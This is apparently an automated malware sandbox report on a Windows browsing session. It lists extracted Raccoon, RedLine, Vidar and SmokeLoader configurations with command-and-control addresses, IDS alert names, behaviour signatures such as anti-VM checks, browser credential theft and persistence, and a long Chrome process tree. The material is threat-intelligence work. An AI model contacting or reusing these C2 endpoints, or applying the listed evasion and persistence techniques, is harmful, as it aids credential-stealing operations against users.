Resubmissions
24-01-2022 18:12
220124-ws75xsgcf6 114-01-2022 15:34
220114-szqyfahceq 1008-01-2022 19:45
220108-ygvfssdbh9 1008-01-2022 19:45
220108-ygvfssdbh8 1008-01-2022 19:34
220108-x95xkadbh3 807-01-2022 14:28
220107-rsy5sscda4 1006-01-2022 19:07
220106-xszdfsbee2 10Analysis
-
max time kernel
512s -
max time network
513s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
20-12-2021 06:37
General
-
Target
https://youtube.com
Score
10/10
Malware Config
Extracted
Family
raccoon
Botnet
8fc55a7ea41b0c5db2ca3c881e20966100c28a40
Attributes
-
url4cnc
http://194.180.174.53/jredmankun
http://91.219.236.18/jredmankun
http://194.180.174.41/jredmankun
http://91.219.236.148/jredmankun
https://t.me/jredmankun
rc4.plain
rc4.plain
Extracted
Family
redline
Botnet
media21n
C2
65.108.69.168:13293
Extracted
Family
redline
Botnet
v3user1
C2
159.69.246.184:13127
Extracted
Family
vidar
Version
49.1
Botnet
915
C2
https://noc.social/@sergeev46
https://c.im/@sergeev47
Attributes
-
profile_id
915
Extracted
Family
smokeloader
Version
2020
C2
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
rc4.i32
rc4.i32
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
suricata: ET MALWARE Fake Software Download Redirect Leading to Malware M3
suricata: ET MALWARE Fake Software Download Redirect Leading to Malware M3
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 32 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 8 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Windows directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 11 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 6 IoCs
-
Modifies registry class 3 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 45 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 23 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://youtube.com1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffbb5304f50,0x7ffbb5304f60,0x7ffbb5304f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1548 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1756 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2292 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2936 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2928 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4544 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4668 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4688 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5380 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5868 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6020 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6004 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5524 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6048 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4464 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5312 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5092 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5260 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xe8,0xec,0xf0,0xc4,0xf4,0x7ffbb5304f50,0x7ffbb5304f60,0x7ffbb5304f703⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3988 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3812 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5520 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5052 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4020 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5384 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2068 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4776 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=984 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4020 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2060 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2532 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6496 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6632 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6460 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7080 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7112 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7228 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2548 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6988 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7244 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7584 /prefetch:82⤵
-
